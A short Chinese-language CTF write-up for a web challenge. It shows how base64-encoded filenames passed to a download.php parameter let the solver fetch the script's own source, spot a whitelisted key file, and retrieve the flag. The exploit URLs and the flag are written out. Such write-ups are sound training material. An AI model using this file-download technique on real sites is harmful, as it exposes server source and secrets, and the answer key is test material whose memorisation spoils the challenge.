网址提供了两首歌的下载链接,分别为
http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=
http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz
可见下载文件名称以base64加密形式出现,于是构造download.php的base64加密ZG93bmxvYWQucGhw
访问http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw下载download.php
download.php
??<?php error_reporting(0); include("hereiskey.php"); $url=base64_decode($_GET[url]); if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){ $file_size = filesize($url); header ( "Pragma: public" ); header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" ); header ( "Cache-Control: private", false ); header ( "Content-Transfer-Encoding: binary" ); header ( "Content-Type:audio/mpeg MP3"); header ( "Content-Length: " . $file_size); header ( "Content-Disposition: attachment; filename=".$url); echo(file_get_contents($url)); exit; } else { echo "Access Forbidden!"; } ?>
发现hereiskey.php同理下载hereiskey.php
?<?php //flag:nctf{download_any_file_666} ?>